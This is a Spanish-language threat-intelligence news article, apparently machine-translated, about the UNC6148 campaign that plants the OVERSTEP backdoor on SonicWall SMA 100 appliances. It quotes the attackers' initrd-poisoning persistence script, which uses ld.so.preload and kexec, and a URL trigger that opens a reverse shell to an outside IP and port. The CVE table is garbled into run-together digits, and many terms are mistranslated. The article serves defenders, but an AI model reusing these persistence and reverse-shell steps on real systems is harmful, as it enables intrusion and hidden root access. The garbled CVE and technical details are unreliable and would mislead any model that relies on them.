Los electrodomésticos de la serie SMA 100 de Sonicwall están nuevamente en primera línea después de que los investigadores desenterraron una campaña encubierta que combina una sospecha de falla de ejecución de código remoto de día cero con una puerta trasera sofisticada llamada Overstep.
La operación, atribuida al Grupo UNC6148 motivado financieramente, primero roba credenciales de administrador y semillas de palabras únicas, luego se convierte en compromiso de dispositivo completo antes de exfiltrar datos y prepararse para la implementación de ransomware.
La cadena de ataque comienza con una explosión de solicitudes HTTP que finalmente entregan al adversario un caparazón en el aparato, una acción que debería ser imposible en condiciones normales.
Analistas de inteligencia de amenazas de Google anotado que una vez que el shell está activo, el intruso exporta la configuración del dispositivo, inyecta silenciosamente reglas maliciosas y carga un binario codificado Base64 en la partición persistente /CF.
Posteriormente, el binario se copia a /usr/lib/libsamba-orrors.so.6 y la fuerza en cada proceso comienza a través de /etc/ld.so.preload, otorgando instantáneamente el alcance de nivel raíz del actor a través del aparato.
Los investigadores vincularon el punto de apoyo inicial con una de varias vulnerabilidades de SMA de larga data que se negocian rutinariamente en los foros del crimen.
La Tabla 1 resume los errores más relevantes que proporcionan la ejecución directa de código o las rutas de robo de credenciales explotadas por campañas relacionadas en los últimos tres años.
CWeyAarAuth? TypeKey ImpactPatch StatusCVE-2021-200382021 Nomemory RCEExecute Código arbitrary no autorizado Julio 2021CVE-2024-384752024Nopath Traversaldump temp.db & Persist.db a las contraseñas de sembrado sembradas 2025CVE-2021-200352021 YOCMAND Inyectionrce a través de /cgi-bin /siteCustomization HandlerPatched 2021CVE-2021-200392021YOscommand inyectionrce a través de /cgi-bin /viewCert Handler vinculado a los abyss ransomwarepched puede 2021cve-2025-3281920252525252025202520202020202020228228192025282282252522525252825, DeletionResets Contraseña de administrador incorporada a contraseña Patched junio 2025
Los comandos de shell ejecutados por el comando dopasswords representan cómo el sobrepaso comprime las bases de datos de credenciales en un archivo de alquitrán en red comercial, asegurando la descarga sin esfuerzo por parte del atacante.
Tácticas de persistencia: secuestro de la secuencia de arranque
Una vez que se asegura el punto de apoyo, la persistencia de cementos UNC6148 reescribe la rutina de BootCurrentFirmware () dentro /etc/rc.d/rc.fwboot.
El script modificado monta el disco RAM inicial comprimido del dispositivo (initrd), planta la biblioteca troyanizada y reescribe initrd.gz, por lo que el código deshonesto se carga antes de cualquier servicio legítimo.
Una operación de “toque” de marca de tiempo alinea las fechas de archivo con la imagen oficial del núcleo, frustrando cualquier verificación de metadatos rápidos.
# Extracto y veneno initrd gzip -d $ fwloc/initrd.gz montura -o loop $ fwloc/initrd $ fwloc/zzz cp /cf/libsamba-errors.so.6 $ fwloc/zzz/usr/lib/echo /usr/lib/libsamba-errors.so.6> $ fwloc/zzz/etc/ld.so.preload umount $ fwloc/zzz && gzip $ fwloc/initrd mv $ fwloc/initrd.gz $ fwloc/initrd.gz/usr/local/sbin/kexec -l $ fwloc/bzimage –append = “` `cat $ fwloc/linux/linux/linux/linux/linux ‘” /usr/local/sbin/kexec -e
Cuando el dispositivo se reinicia, cada binario dinámico, que incluye el servidor web responsable de registrarse, se reúne contra la biblioteca maliciosa.
Overstep Hooks se abren*, readdir*y escribe para ocultar su presencia y analizar buffers entrantes para las cadenas Dobackshell o Dopasswords.
Un solo http get tales como https: // dispositivo/consulta? Q = DoBackShell, 1.2.3.4,4444 desencadena un shell inverso sin tocar registros de disco, gracias a la manipulación de registros en memoria ejecutada dentro de la llamada de escritura secuestrada.
El resultado es un punto de apoyo resistente: incluso los electrodomésticos totalmente parcheados pueden volver a comprometerse siempre que las credenciales robadas sigan siendo válidas.
Los analistas de Google instan a los defensores a los discos de imagen fuera de línea, rotar cada contraseña y semilla OTP, y verificar la ausencia de /etc/ld.so.preload; Su propia existencia en el hardware de SMA es “equivalente al compromiso”.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
